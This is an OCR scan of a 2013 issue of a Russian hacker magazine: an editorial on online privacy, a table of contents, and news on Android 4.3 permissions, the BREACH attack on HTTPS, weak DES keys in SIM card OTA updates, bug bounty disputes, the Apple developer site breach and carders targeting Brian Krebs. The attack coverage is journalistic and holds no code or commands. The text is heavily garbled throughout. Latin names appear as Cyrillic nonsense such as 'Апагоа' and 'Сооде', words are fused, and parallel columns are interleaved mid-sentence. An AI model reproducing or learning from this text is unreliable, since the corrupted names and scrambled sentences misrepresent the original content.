Тыточно уверен, что твоя шутка, сказанная на просторах 
интернета, не выйдеттебе боком в реале. Ты знаешь, 

что вближайшие десятилетия утебя не будет проблем скаки- 
ми-нибудь коллекторами. Никтоне будетискать тебя, пытать- 
ся пробить по номеру и социальным сетям, чтобы продолжить 
дорожно-транспортный конфликтнатвоейтерритории. В тво- 
ей личной жизниточно не планируются крутые повороты, 
вкоторые, натужно гудя двигателем, мощновпишется КАМАЗ 
брутального родственника девушки иего маленькие друзья — 
баллонный ключ и монтировка. Проблемы на работе из-за 
резкихвысказываний вадрес руководства компании или 
правительства страны? Практически невероятно! И конечно, 
интимные фототвоей подружки никогда не станут достоянием 
развлекательных сайтов для офисного планктона. Еслиты со- 
гласен совсеми приведенными утверждениями — значит, 

ты просто недержишь свои глаза открытыми. 

Добро пожаловать в реальность: ХХ! векбуквально застав- 
ляеттебя заботиться отом, очем следовало начать заботить- 
сяещеназаре развития сетей, — о сохранении приватности, 
анонимности, защищенности коммуникаций! УРМ, дедик 
зарубежом, никакихреальных ФИО в социальных сетях, мпое 
91$Кк епсгур#оп наноуте и смартфоне, шифрование флешки, 
асимметричное шифрование важной переписки, [2Р, ТОР, 
серфингпо критичным сайтам — только черезвиртуальную 
машину! Сегодня, в 2013 году, все это должно использоваться 
самым обычным айтишником — ивовсе даже не блэкхетом 
или каким-нибудь экстремистски настроенным оппозицион- 
ным педофилом. 

Насаживай систему, читай наш журнал и да пребудет 
стобой сила! 


Александр «Ог. Коип!>» Лозовский 
редактор ||, 
1охтоузКу@геа!.хакер.ги 
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СРАВНИТЕЛЬНЫЙ ОБЗОР 
ЧЕТЫРЕХДИСКОВЫХ 
МАЗ’ОВ 


В этом мире, кажется, завсеми 
следят. Как выжить в таких нечело- 
веческих условиях? 


ПАРАНОЙЯ? «4 


ГРИГОРИЙ БАКУНОВ, 
ВЕДУЩИЙ РАДИО-Т И ДИРЕКТОР 
ПО РАСПРОСТРАНЕНИЮ 
ТЕХНОЛОГИЙ В ЯНДЕКСЕ 


МЕСАМЕМ!$ 

КОЛОНКА СТЁПЫ ИЛЬИНА 
РВООЕ-ОЕ-СОМСЕРТ 
ДВАДЦАТЬ ЛЕТ ПАРАНОЙИ 
ШАПКА-НЕВИДИМКА 

МЕНЯ ЗОВУТ НИКТО 

ТАЙНИК В ОБЛАКАХ 

НАХОДКА ДЛЯ БОЛТУНА 
ТРАДИЦИОННЫЙ ТВИТ СО СЦЕНЫ 
МАЗДРОМ 

А$05 РОЗ210Е 

КУЛЬТ КАРГО НА ДИВАНЕ 

КАК ПРАВИЛЬНО ПОДСТУПИТЬСЯ 
КЛЮЧЕВОЙ МОМЕНТ 

ИСТОРИЯ АВМ 

НА ПОРОГЕ ПАНДЕМИИ 

КИПИТ РАБОТА НА МЕСТАХ 
ЕАЗУ НАСК 

ОБЗОР ЭКСПЛОЙТОВ 
КОЛОНКА СИНЦОВА 

БОЕВОЙ ХОНИПОТ ИЗ БАЗЫ ДАННЫХ 
КУКУШКА В ДЕЛЕ 

ПЕНТЕСТ ЭКСПЛОЙТ-ПАКА 
ОХОТА ЗА ПРИЗРАКОМ 
НАРЯЖАЕМ ОЛЬКУ 

Х-ТО0Е5$ 

ЛЕТОПИСЬ БУТКИТОВ 

БЭКДОР ПОД МИХ 

КРИПТОР НА СИШАРПЕ 
ВИДЕОЧАТ БЕЗ ПЛАГИНОВ 
ЗАДАЧИ НА СОБЕСЕДОВАНИЯХ 
МАСТЕР НА ВСЕ РУКИ 
ПАРАНОИД ЛИНУКСОИД 
ВИРТУАЛОК КОМАНДИР 
УНИВЕРСАЛ В КУБЕ 

ГАО ОМТЕО 

ДИСКО 
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СЕНТЯБРЬ 


№ 176 


Все новое за последний месяц 

Параноик? Нет! Кажется, нет 

Интернет через воздушные шары 

Ретроспектива болезни 

Обзор способов оставаться анонимным в Сети 

Обзор ме СО для шифрования информации и анонимности пребывания в Сети 
Поднимаем сервис для хранения и синхронизации конфиденциальных данных 
Безопасные способы общения в Сети 

Интервью с Григорием Бакуновым ака ВобикК'ом 

Сравнительное тестирование четырехдисковых МА$ 

4К-монитор отАЗИ$ 

Обходим геоблокировку контент-сервисов на любых устройствах 

Средства удаленного доступа на все случаи жизни 

Обзор кросс-платформенных менеджеров паролей 

Маленькая британская компания, подарившая миру мобильную революцию 
История мобильного вирусописательства на примере Апаго!а 

Прошиваем, обновляем итюнингуем смартфон, не покидая Апаго!а 
Хакерские секреты простых вещей 

Анализ свеженьких уязвимостей 

Скорость реакции как показатель ИБ 

Сногсшибательный вектор атак на клиенты МУЗОЕ 

Автоматизация поиска вредоносных файлов в корпоративной сети на базе Сискоо Запабох 
Анализ защищенности В!аскпое ехрой КИ 

Криминалистический анализ слепков оперативной памяти 

Подбираем наиболее интересные плагины для популярного отладчика 

Софт для взлома и анализа безопасности 

[-исследование: самая полная история буткитов, написанная человеком за последние 2000 лет! 
Ипих/Сдогкед.А — серьезная угроза для серверов 

Защищаемся от сигнатурного сканера методами ХХ! века 

Юзаем \Меб ВТС +- сокеты для звонков из чистого браузераа 

Подборка интересных задач, которые даютна собеседованиях 

Обзор альтернативных прошивок домашних роутеров 

Гайд по обеспечению безопасности Ипих-системы 

Обзор полезного софта для управления виртуализацией 

НР РгоЦап{ №541 @7 МсгоЗегуег: маленький сервер для больших задач 
Вопросы и ответы 

8,5 Гб ВСЯКОЙ ВСЯЧИНЫ 


Удобные меб-сервисы 


Новость месяца 


МЕ\Л 


АМОНОГО 4.3, 
ЧТО НОВЕНЬКОГО? 


СООСЕЕ ПРЕДСТАВИЛА НОВУЮ ВЕРСИЮ ОС 


пагою 4.3 — уже третий релиз от Сооде, не при- 

вносящий видимых отличий. Во многом повто- 

ряется то, как развивалась вторая ветка Апагоа: 

отличия между версиями 2.0 и 2.3 не были сильно 

заметны на глаз. Ключевые новшества новой ОС 

находятся под капотом: новые наработки в рамках 

Ргоес{ Вийег (увеличение отзывчивости и плав- 

ности интерфейса), поддержка ТЕМ (механизм 

эффективного управления флеш-памятью) и Вищос{й Зтам. 

Между тем визуальные изменения происходят в атай, Сооде 

Саепааг и других «фирменных» приложениях. И что самое ин- 

тересное, поскольку эти приложения обновляются напрямую 

через Сооде Р!ау, новшества будут доступны пользователям 

даже устройств с Апаго 2.2. Может быть, проблема фрагмен- 

тации все-таки преувеличена? По крайней мере, с точки зре- 
ния пользователя. 

Более интересно выглядит изменение системы привиле- 

гий: теперь есть возможность управлять уровнем доступа кон- 

кретных программ (скажем, запретить определенному при- 


ложению отслеживать месторасположение). Вот об 
этом и поговорим подробнее. 

Первые признаки внедрения системы ЗЕМпих 
были обнаружены сообществом еще в Апагога 4.2, но 
окончательно все заработало только в новой версии. 
Суть изменений в системе привилегий, где возможно- 
сти каждого процесса определяются администрато- 
ром, и ничто не может перезаписать их, — это, конеч- 
но, значительно улучшает и повышает безопасность. 
Даже если некая малварь была запущена в системе, 
этот процесс не повлияет на другие. Однако у этой 
медали есть и обратная сторона: это также означает, 
что с гоо91-доступом в Апагог 4.3 все будет несколько 
сложнее, чем раньше. 

До конца оценить последствия нововведений 
сложно, но при первом приближении разработчики 
говорят, что теперь для получения полноценного рута 
потребуется заливать альтернативный образ. Такова 
плата за улучшенную защиту. 


к. 
ь 4 


Мария «МИг» 
Нефёдова 
шИи@геа!.хаКер.ги 
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Крометого, Сооч!е 
анонсировалаконку- 
рента функции Ета 
Му!Рпопе для О$- 
аппаратов. Служба 
получиланазвание 
АпагоА Вемсе Мападег 
и позволит упростить 
пользователям поиск 
собственных украден- 
ных или потерянных 
устройств. Можно 
заставить девайс из- 
дать звуковой сигнал, 
посмотретьего место- 
положениенакарте или 
удаленно уничтожить 
все данные. 
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УЯЗВИМОСТЬ 
ВНТТРЪ 


ВЗЛОМАТЬ ЗА 30 СЕКУНД 


а ежегодной конференции Наск На, 
прошедшей в Лас-Вегасе, был пред- 
ставлен доклад, проливающий свет 


на новую уязвимость в НТТР5. Атака 
ТМ 
получила название ВВЕАСН, она по- 
зволяет восстанавливать содержимое отдельных 
секретных идентификаторов (например, сес- 


сионные сооке и СЪВЕ-токены), передаваемых 
внутри зашифрованного НТТР$-соединения. Ата- 
кующий может дешифровать закрытые данные, 
В е 7 () №/ АТ Ы В ГТО | ы | К ИИ которые, к примеру, системы онлайн-банкинга 
и платформы электронной коммерции передают 
в ответ клиентам по протоколам ТЕЗ и $$. Техни- 
И || ()] №/ - И и Ы ® () () ка весьма схожа с методом СЁАМЕ (Сотргезюп 
Вано по-еак Маае Еазу), что представили в про- 
шлом году. Для осуществления атаки нужно полу- 
- А КС () Н чить контроль над трафиком на промежуточном 
шлюзе и заставить браузер жертвы «съесть» нуж- 
ный Уауа5сир{-код. В зашифрованном трафике 
ХАКЕРА ОБИДЕЛ РАЗМЕР ПРЕДЛОЖЕННОГО ВОЗНАГРАЖДЕНИЯ нужно будет выявить блоки данных с метками, 


отправляемые уауаЗспр{-кодом на сайт, для ко- 
торого требуется перехватить данные. Скажем, 


рограммы вознаграждений за найденные уязви- Междутем ВИТоггеп+ на восстановление СЗВЕ-токена у авторов мето- 
мости получают все более широкое распростра- запустил бета-версию да ушло порядка 30 секунд. Точность восстанов- 
нение, и пытливые умы ежедневно проверяют сервиса ВИТоггеп: $упс ления токенов оценивается в 95%. 
популярные сервисы и сайты на прочность. В го- для автоматической 
ловах людей все сильнее укореняется мысль, синхронизации фай- 

что за найденные баги им обязательно заплатят. Как оказа- лов междуразными 

лось, не всегда все так радужно. устройствами, что мы 

Недавно хакер, скрывающийся под ником Мещае, пове- начинаем активно ис- 
дал широкой публике свою не слишком веселую историю. пользовать вредакции. 


Еще в мае текущего года любознательный парень сумел по- 
лучить полный доступ к серверам компании ВИТогтетт. Удиви- 
тельно, но ничего дурного с полученным доступом хакер де- 
лать не стал, лишь детально изучил хранящуюся на серверах 
информацию и сделал оттуда несколько бэкапов. После чего 
честно решил уведомить ВИТоггет пс. о найденной бреши. 
Сначала казалось, что все идет хорошо, — компания вырази- 
ла хакеру благодарность и пообещала денежное вознаграж- 
дение. Однако потом МещаЁа попросили выслать инвойс, 
чтобы перевести ему деньги, а в итоге все и вовсе закончи- 
лось выплатой смехотворной суммы — 500 долларов. 

Стоит ли говорить, что хакера такое положение дел оскор- 
било, — в конце концов, он (или кто-либо еще) имел возмож- 
ность влезть даже в билды торрент-клиентов и финансовые 
данные компании! Раздосадованный взломщик в ответ на- 
чал публиковать утащенную с серверов информацию: БИ. 


[у/Лсхигие. 


—> Май.ги теперь использует —> Первые деньги за уязвимости —> ВИсот официально запре- —> Использование чужих фай- 
собственный поисковый движок, выплатила компания Мсго$оН. тили в Таиланде. Департамент лов сооКе для перехвата сессии 
отказавшись от поиска СоодЕе. Награды удостоился сотрудник валютного регулирования и банк все еще проблема многих сер- 
Месячная аудитория поиска тан.ги Сооде Иван Фратрич, нашедший Таиланда объяснили это «отсут- висов, установил хакер Сэм Боузн. 
составляет 39,5 миллиона человек. дырки в (Е 11. Увы, сумма не на- ствием контроля за движением Баг до сих пор работает для Мейх, 


зывается. средств». ТумКег, Митео и других. 
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БОРЬБА С /РМ 
УЖЕ НАЧАЛАСЬ 


ока в Сети мрачно шутят, что вслед за анти- 

пиратскими законами правительство попро- 

сту запретит использовать УРМ и шифрова- 

ния, другие уже начали претворять эти идеи 

в жизнь. МачегСага и \Мза решили ввести 
санкции против \/УРМ-провайдеров (ранее платежные си- 
стемы уже «бойкотировали» файлообменники сходным 
образом). Уже пострадал \УРМ-провайдер !Ргедаюог, ко- 
торый многим известен как детище одного из сооснова- 
телей Тпе Ризе Вау Питера Сунде. Шведская платежная 
система Раузоп ограничила доступ к сервису, получив 
«указание сверху», а именно от Ма и МаегСага. Так- 
же под раздачу попали аналогичные сервисы Аппопше, 
Мимаа, УРМТиппе|, РиуаМРМ. 

Разумеется, Питер Сунде молчать не стал и уже выра- 
зил недоумение по поводу того, что финансовые потоки 
блокируются без судебных санкций, кроме того, блоки- 
руются ресурсы неамериканских компаний, которые не 
имеют отношения к США и занимаются легальным бизне- 
сом. «Это уже даже не глобальная слежка АНБ, это просто 
какое-то безумие», — заявил Сунде. 


Заметим, что похожие 
методы борьбы ис- 
пользуети РауРа!, так- 
женачавший недавно 
отклонять платежи по- 
добных поставщиков. 
Атем, кто сейчас по- 
думал об интересных 
альтернативах вроде 
ВКсот, напомним, что 
ВСнедавно уже запре- 
тили в Таиланде. 


—> Джон Кармак присоединился —> ЕЗЕТ сообщает: 60% рос- 


к проекту Осци$, разрабаты- 
вающему устройство Осши$ В, 


сийских пользователей хоть раз 
теряли контроль над своим акка- 


в качестве СТО. Однако 14а ЗоН\маге унтом в соцсетях. Еще 25% юзеров 


Кармак не покидает. 


взламывали неоднократно. 


МИЛЛИОНОВ 


ДОЛЛАРОВ 
СОСТАВИЛИ 
УБЫТКИ 
МСВОЗОЕТ 


—> Недавно компания представила 
годовой отчет, который показал, что 
убытки в связи с переоценкой склад- 
ских запасов планшетов Зи!асе АТ 
составляют 900 миллионов долларов. 
Выяснилось, что сами планшеты пока не 
принесли компании ни цента прибыли. 
После этого известия акции Мсго$оН 
рухнули за день на 11,4%. 


КНИГ в РУЯЕТЕ 
ВОРОВАННЫЕ 


Интересное исследование приводит 
издание Г1.ги. Согласно ему, около 92% 
всех электронных книг россияне не по- 
купают, а попросту скачивают бесплатно 
со всем известных ресурсов. Скажем, 

в США этот показатель не превышает 
12%. По данным того же исследования, 
в России на «цифру» перешло уже 70% 
аудитории. 
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@ООСЕЕ-ГАДЖЕТЫ 


ВТОРОЕ ПОКОЛЕНИЕ МЕХО$ 7 И СООСЕЕ СНВОМЕСА$Т 


омимо анонса новой версии Апагоа, компания Сооде также порадовала 
пользователей сразу двумя железками, аинформацию о девайсе Спготесаз$1 
компании и вовсе удавалось сохранить втайне почти до самого анонса. 
Но сначала поговорим о том, чего Соое не скрывала, — о втором по- 
колении планшетов Мехи$ 7. Этот аппарат стал первым анонсированным 
устройством на базе новой ОС Апагога 4.3, с которой был представлен в один день. Планшет 
по-прежнему семидюймовый, однако изменилось разрешение экрана: теперь 1920 х 1080 
точек, то есть наконец-то Ри! НО. Хотя дизайн остался практически неизменным, устрой- 
ство «похудело», став на три миллиметра тоньше и на пятьдесят граммов легче предше- 
ственника. Также на задней стороне появилась камера 5 Мп, которой не было в первом 
Мехи$ 7. Как уже должно стать ясно, обновления коснулись в основном внутренностей план- 
шета. Так, второе поколение получило на борт четырехъядерный процессор Зпарагадоп 54 
Рго и 2 Гб оперативной памяти. Новый Мехи$ 7 поставляется в трех вариантах: с 16 Гб или 
32 Гб встроенной памяти, плюс старшая 
модель может поддерживать или только 
ММ-Е, или \М-РГ + (ТЕ. Отдельно радует 
весьма демократичная цена: 229 долла- 
ров за младшую версию и 349 за самую 
продвинутую. 

Если анонс Мехи$ 7 мало кого удивил, 
то представленное почти одновремен- 
но устройство Сооде Спготеса${ ста- 
ло сюрпризом почти для всех. Что это 
за свисток, спросишь ты, глядя на фото? 
Это миниатюрное устройство (12 х 12 см) 
подключается к НОМ!-входу ТВ или реси- 
вера и воспроизводит онлайн-контент, 
будь то видео, аудио или фото. Инте- 
ресно, что своих органов управления 
и/или интерфейса СПготеса${ не име- 
ет, — для управления тебе понадобится 
подключить к сети любое устройство 
с Апаго или 0$ на борту или попросту браузер Спготе. Выгодное отличие от АйР|ву, вер- 
но? Само устройство, по сути, [ИА -сервер, разработанный недавно УочцТибе и Мех (это 
не протокол потокового вещания, это метапротокол, запускающий драйверы протоколов 
на устройстве-приемнике). Плеером в данном случае выступает сам Спготесаз${, стриминг 
того же \очТибе напрямую идет по \\/-Е1! на него, а другие устройства лишь играют роль 
пульта ДУ. Разумеется, должна быть хоть какая-то ложка дегтя. Во-первых, Спготеса${нуж- 
но питание, так как НОМГ для этих целей не хватит. Запитать девайс можно от ЧЗВ-портов 
ТВ или от розетки, подключив к нему блок питания (входит в комплект). Во-вторых, пока 
для устройства есть всего три приложения: УоиТибе, Меайх и Сбооде Рау. Однако нужно от- 
дать должное — работают все три отлично. Ну и последнее — цена Спготеса$1 в США со- 
ставляет всего 35 долларов. 


Для Спготеса$Е есть 
пока всего три при- 
ложения: УоиТиБе, 
№ еек и Соое Рау. 
Однако нужно от- 
дать должное — ра- 
ботают все три 
отлично 


Надолю первого Мехи$ 7 пришлось почти 10% отвсех продаж планшетов на Апаго! за последний 
год. В Соод!е уверены, что вторая версия покажет себя какминимумнехуже. 


<ООСЕЕ ВЫПУСТИЛА 
ПАТЧ ДЛЯ НАШУМЕВШЕЙ 
ДЫРКИ 


—> Не так давно компания Виебох обнаружила 
уязвимость в Апагог4, затрагивающую почти 900 
миллионов устройств. Уязвимость позволяет зло- 
умышленнику модифицировать файл АРК, не меняя 
его криптографической подписи. Другими словами, в 
любое приложение можно добавить троян, сохранив 
криптографическую подпись оригинального автора. 


ЛЯПЫ ВХОДЕ БОРЬБЫ 
СПИРАТСТВОМ 


—> Не секрет, что борьба с пиратством на Западе по- 
ставлена на поток и автоматизирована. Так, недавно 
телекомпания НВО попросила СооЧе «закрыть» стра- 
ницу, где можно скачать МЕС Меага Р!ауег. Конечно, ро- 
бот, собирающий ссылки на «Игру престолов» и другие 
шоу НВО, просто ошибся, но ошибка тревожная. 


ЕЩЕОДИН 
«КРУПНЕЙШИЙ ВЗЛОМ 
ВИСТОРИИ» 


—> ВСША раскрыли очередную «аферу века». На этот 
раз Минюст США рассказал о предъявлении обвине- 
ния пяти кардерам, которые в сумме ответственны 

за хищение дампов более 160 миллионов банковских 
карт. В корпоративные сети банков взломщики про- 
бирались в основном при помощи 5! -инъекций. 
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> М-КАРТЫВ ОПАСНОСТИ 


ФУНДАМЕНТАЛЬНАЯ УЯЗВИМОСТЬ ОБНАРУЖЕНА В СОВРЕМЕННЫХ $1М’КАХ 


риптолог и исследователь Карстен Нол, известный, к примеру, тем, что в 2009 
году обнаружил серьезную уязвимость в протоколе О$М, нашел новую дыру 
в безопасности сотовых сетей. На этот раз проблема в самих $!М-картах. 

На прошедшей недавно В!аск На{ Нол зачитал подробный доклад о найден- 
ной проблеме. Оказывается, еще в 2011 году Нол и его компания Зесийу Везеагсй аб 
приступили к изучению протокола ОТА (о\ег-Пе-а!, когда устройство «по воздуху» полу- 
чает особые, бинарного вида ЗМ$). Данный протокол используется для удаленного об- 
новления ПО на $!М-картах, ведь каждая 5!М’ка — устройство сложное, по сути настоящий 
микрокомпьютер с процессором, ВАМ, ВОМ, микросхемой памяти, поддерживающей 
шифрование, и операционной системой. Карты, разумеется, бывают разные, различ- 
ных стандартов, их отличает объем памяти и функционал. Возможности $!М-карт можно 
расширять с помощью специализированного ПО, написанного на базе чуама. То есть со- 
временная $!М-карта работает под управлением довольно простой ОС, реализованной 
с помощью чуама Сага. Именно уауа Сага обеспечивает работу небольших апплетов в пе- 
сочнице, предотвращая утечку важных данных из одних приложений в другие. Однако Нол 
и его коллеги выяснили, что уауа Сага исходно неправильно сконфигурирована и генери- 
рует крайне слабые ключи, используя шифр Бата ЕпсгурНоп З{апдага$ (0Е$), созданный 
в еще 70-е годы! 

Итак, на практике все это может обернуться вот чем. На сайте Зесищу Везеагсй 1аБ 
Нол пишет: «Когда атакующий отправляет на устройство собственное бинарное $М$, $М- 
карта не станет исполнять некорректно подписанные ОТА-команды. Однако во многих 
случаях на попытку атаки карта ответит 
ошибкой, переслав код ошибки, содер- 
жащий криптографическую сигнатуру, 
и отправив ее посредством такого же 


После взлома хакер 
может запросить бинарного $М$. С помощью радужной 
таблицы компьютер способен преобра- 


месторасположе ние зовать это сообщение в 56-значный ОЕЗ- 

< ключ примерно за две минуты». Дальше 
устройства, похи- 

свои бинарные 5М$ полученным ключом 

и, по сути, может сделать с телефоном 

вообще клонировать сположение, похитить данные, слать 

ЗМ$ на платные номера или вообще кло- 

$М-карту 


злоумышленник уже может подписывать 
шить данные или 

все что захочет — запросить местора- 

нировать карту. 


Уязвимость Карстен 
Нол проверял при- 
мерно натысяче 
телефонов с разными 
$1М-картами, разных 
стран и операторов. 
Итог довольно печален: 
уязвима каждая вось- 
маятрубка. Отсюда 
исследователь сделал 
вывод, что на сегодня 
уязвимы примерно 750 
миллионов устройств 
вмире. В качестве «ле- 
карства» Нол выдвинул 
идею фильтровать $М$ 
внутри сетей опера- 
торов. 
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МЕТРО СЛЕДИТ 
ЗАТОБОЙ 


—> Московское метро вводит два новшества. 

Первое — видеосистема, распознающая лица. Также 

у пассажиров будут считывать данные 5!М-карт. По не- 
подтвержденным данным, использоваться будут 1М$|- 
саспегы, притворяющиеся базовыми станциями и 
считывающие уникальные идентификаторы абонентов. 


= ОрепОЙЯсе"4 


Е Тепловитет 
с 
е ны 


Е уетитол 


08 о 


ОФИСНЫЕ ОБНОВЛЕНИЯ 


—> Вслед друг за другом вышли обновления популяр- 
ных офисных пакетов МбгеО се 4.1 и Ореп О Йсе 

4.0, некогда основанных на единой базе. Изменений 
немало. Так, в МюгеО се появились боковые панели 

и было исправлено три тысячи ошибок. Ав Ореп Осе 
радикально переработан весь интерфейс. 


ПРЕДУПРЕЖДЕНИЯ? КА- 
КИЕ ПРЕДУПРЕЖДЕНИЯ? 


—> Университет Беркли совместно с разработчиками 
Соод/е выяснил, что пользователи фактически игно- 
рируют предупреждения о безопасности в браузере. 
Сообщение о неверном 5$1-сертификате пропустили 
70,2% юзеров Спготе. Еще 15,1% оставили без вни- 
мания сообщение о малвари на сайте. 
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БРАЙАНКРЕБС 
ИГЕРОИН 


КАРДЕРЫ ПРОДОЛЖАЮТ ВОЙНУ С ИБ-ЭКСПЕРТОМ 


|аск ПаРы всего мира определенно не любят Брайана 
Кребса. Недавно мы рассказывали о том, как недоволь- 
ные исследованиями и разоблачениями Кребса хакеры 
и кардеры вызвали к эксперту домой группу спецназа, 
еще раньше на имя Кребса взяли кредит в размере 20 ты- 
сяч долларов, а также журналисту не раз присылали деньги с укра- 
денных банковских карт. История получила закономерное продол- 
жение, на этот раз Кребсу прислали... героин. 

Новую подставу, по словам Кребса, спланировали на одном из 
закрытых русскоязычных форумов. Среди мемберов был объявлен 
сбор Вйсот «Кребсу на наркотики», то есть для покупки грамма ге- 
роина в магазине, работающем через Тог и расположенном в зоне 
‚опюп. Довольно быстро удалось собрать больше двух биткоинов, 
и 12 пакетиков с порошком (10 + 2 бонусных) по цене 1,6532 ВС 
отправились на адрес Брайана по почте. Шутники собирались со- 
общить в полицию о том, что Кребсу должна прийти партия нар- 
котиков, таким образом гарантированно подставив журналиста. 
Но фокус не удался. Оказалось, что Кребс наблюдал за операци- 
ей с самого начала и давно предупредил ФБР и полицию, что ему 
скоро пришлют компрометирующие вещества. Пришедшую в на- 
значенный день посылку, в которой действительно был порошок, 
спрятанный в глянцевом журнале, попросту забрал наряд полиции. 


Винтервью Мсе 
один изорганиза- 
торов «розыгры- 
ша» пояснил, что 
сделановсеэто 
было «радилулзов» 
ипотому, что Кребс 
посей день опла- 
чивает свои ланчи 
деньгами, которые 
утекаютпоего 
вине изкарманов 
кардеров. 


[Рз МОЕ МА 
[РСМ вг МАЕ ВСР. 
6 @ 


—> АдорВе провела месяц «по- 
нимания пиратов». Компания 
прекратила десяток уголовных дел 
против пиратов и снизила цены 

на свои продукты на 40%. 


—> ЕнеТох обновился до версии 
23, принесшей важное изменение 
в безопасности: запрет по умол- 
чанию на смешанный контент 
(сайты, работающие по НТТР, но 
содержащие НТТР-контент). 


Воми тисН Поме чото ту [юБ. 1 Паме ай пе 
деесе4 Бид$ геройед › сотрапу апа 
мы а! ве 
Чааз 1Пауе, опу до! ай Пезе дааз № зее 
о або Пауе итоптед 
арре Беюге Фезе да. 


ВЗЛОМАН АРРЕЕ ОЕУ 
СЕМТЕВ 


ХАКЕР ПОПРАКТИКОВАЛСЯ НА САЙТЕДЛЯ РАЗРАБОТЧИКОВ 


прошедшем месяце многие СМИ писали о взломе сайта для раз- 
работчиков Арре, однако продолжение этой истории почему-то 
освещали уже не так широко. Дело в том, что взломщик сам при- 
знался в содеянном, появившись в комментариях к статье про 
взлом Арре Оеу Сещег на{есйсгипсй.сот. «Виновником торжества» оказался 
турецкий программист Ибрагим Балик, по совместительству выступающий 
консультантом по безопасности. Сайт Арре Балик решил поковырять исклю- 
чительно в целях общего развития и самообразования и с удивлением обна- 
ружил 13 уязвимостей, благодаря которым без труда получил доступ к базам 
данных. О своей находке «хакер» тут же уведомил Арре, правда предвари- 
тельно сохранив персональные данные примерно ста тысяч разработчиков. 
Собственно, кусок именно этих данных Балик предъявил в Сети в доказатель- 
ство ответственности за взлом. 

В ответ на поступившую информацию о дырках Арре даже была вынужде- 
на отключить сайт, чтобы исправить уязвимости и заново развернуть инфра- 
структуру (полное восстановление заняло больше недели!). Балик пишет, что 
теперь опасается судебного преследования, хотя он не желал ничего дурного 
иим руководило простое любопытство. 


Сайт Арре Балик решил поковырять 
исключительно в целях общего раз- 
вития и судивлением обнаружил 1з 
уязвимостей, благодаря которым 
получил доступ к базам данных 


—> Массовая атака, нацелен- 
ная на сайты, работающие под 
управлением уооп!а и \№огаРге5$, 
связана с распространением 
Тго]ап \М/РСгаскКег.1, сообщает 
«Доктор Веб». 


—> За последние полгода 
специалисты центра СЕВТ-С!В 
выявили 896 вредоносных до- 
менов, угрожающих безопасности 
пользователей Рунета. 86% сняли 
с делегирования. 


то МЕ\/$ 


КАСТОМИЗИРУЕМ 
СМАРТФОН 
ОГМОТОНОГА 


НОВИНКА, ИНТЕРЕСНАЯ НЕТОЛЬКО НАРАЩИВАНИЕМ ЯДЕР 
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отя компания Маогоа официально покинула рос- 
сийский рынок, поклонников гаджетов именно этого 
бренда у нас по-прежнему много. Представленная 
недавно новинка Мото Х доказывает, что Моого!а 


мы продолжаем любить не зря :). и 
Технические характеристики новинки нельзя назвать рево- Помимо прочего, ке ДОЛЛАРОВ СТОИ- 


люционными и запредельными, все довольно обычно: дисплей Мото Х можетпо- К, 

4,7" с разрешением 720р, двухъядерный процессор Мотого!а хвастаться голосовым А МОСТЬ КОРПОРАЦИ И 
Х8 (1,7 ГГц), четырехъядерный Аагепо 320 СРУЦ и два специали- управлением. После мн 

зированных процессора 1-МЕР и ССР, которые обеспечивают фразы «ОК, Сооче уе, ООС | 

обработку данных, поступающих с датчиков и аудиосенсоров. Мом!» аппаратготов 

Плюс 2 Гб ОЗУ и 16 или 32 Гб флеш-памяти. Казалось бы, все распознавать ивы- а У Акции Сооде установили новый 
традиционно, но в этот раз Мотогоа сделала ставку на персо- полнятьлюбые другие рекорд — их стоимость возросла на 7,32% 
нификацию, а не на количество ядер. Дело в том, что на смарт- голосовые команды { и достигла отметки 926,47 доллара за еди- 
фон можно установить множество сменных панелей различной владельца. Другие дат- ницу. Так, сейчас Сооде можно оценить 
текстуры и цвета, сделать на корпусе гравировку «из коробки», чики реагируют на дви- И в 304 миллиарда долларов, что на 50 
подобрать в цвет наушники и даже зарядное устройство. На За- жение, кпримеру, при А | миллиардов больше прошлого показателя. 
паде цена новинки составит 575 и 629 долларов для моделей покачивании смартфон Дл Аналитики предрекают, что прибыль бооде 
с 1би 32 Гб флеш-памяти соответственно. включаеткамеру. га в текущем квартале превысит ожидаемые 


показатели. 


ТЫСЯЧ ДОЛЛАРОВ 
СРЕДНЯЯ ЗАРПЛАТА 
ИБ-СПЕЦИАЛИСТА 
ВСША 


—> На западном рынке зреет серьезный 
недостаток профессиональных хаке- 

ров, сообщает компания Витта С!а$$ 
Тесппоо9!е$. Уже сегодня ощущается 
нехватка 20—40 тысяч ИБ-специалистов, 
ив будущем станет только хуже. Зарплаты 
меж тем закономерно растут: средний 
«безопасник» в США получает 116 тысяч 
долларов в год, или 55, 77 в час. 


к 


Миллион долларов возна- Про [ЕЕ СОМ сняли докумен- 
граждений выплатила Гасебоок тальный фильм. Почти двухча- 
за найденные уязвимости. Награды совая лента о самой крутой кон- 
получили уже 329 хакеров, самому ференции доступна совершенно 


младшему из которых всего 13 лет. бесплатно: уоцти.бе/и\/маебСИН\у“. 
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БЫСТРЕЕ, 
ВЫШЕ, СИЛЬНЕЕ 


ГЛАВНЫЕ НОВШЕСТВА ВООТЗТВАР 3 


конце июля в официальном блоге разработчиков Воо{$гар ( 

) появилась информация о выходе третьей версии этого популярнейше- 
го адаптивного С$$-фреймворка. Строго говоря, это не финальная версия, 
а всего-навсего релиз-кандидат. 

Ключевым изменением нового Воф&тар стал, конечно же, полностью об- 
новленный внешний вид. Разработчики отказались от градиентных тактильных стилей 
в пользу более современного «плоского» дизайна. Элементы управления стали более 
легковесными, в особенности это заметно на кнопках и паураг, самом узнаваемом эле- 
менте Воо{$гар — черной навигационной панели в верхней части страницы. Визуальные 
элементы, привязанные к текстовым полям, также стали монотонными, а для типографи- 
ки появилось несколько новых 19 меюв-классов. В целом АС] выглядит свежо и совре- 
менно, но для тех, кто привык видеть Воо{$гар совершенно другим, поначалу может быть 
очень неожиданно. 

Под капотом у нового Воф®тар тоже много нового. Во-первых, Воф$гар больше 
не поддерживает ИЕ 7 иЕР 3.6. Девелоперы убрали из кода фреймворка множество хаков 
и специфических префиксов, которые были необходимы для корректного отображения 
страниц в этих «старичках», благодаря чему код стал значительно чище. Во-вторых, при- 
оритет разработчиков заметно сместился в сторону тоБ!е Ягз1. В свете этого был осно- 
вательно переписан главный структурный элемент Воо{${ тар — сетка. Вместо привычных 
зрап’ов теперь есть два класса «ячеек» — .со!-* для смартфонов, .со|-$т-* — для план- 
шетов. Соответственно, новый «бутстрэп» уже несовместим с более старыми версиями 
ветки 2.х, и миграция простой подменой С$$- и /$-файлов больше невозможна. Кста- 
ти, проект обзавелся собственной бесплатной СОМ, так что теперь подключать файлы 
фреймворка можно просто, и при этом не возникнет дополнительных задержек. 

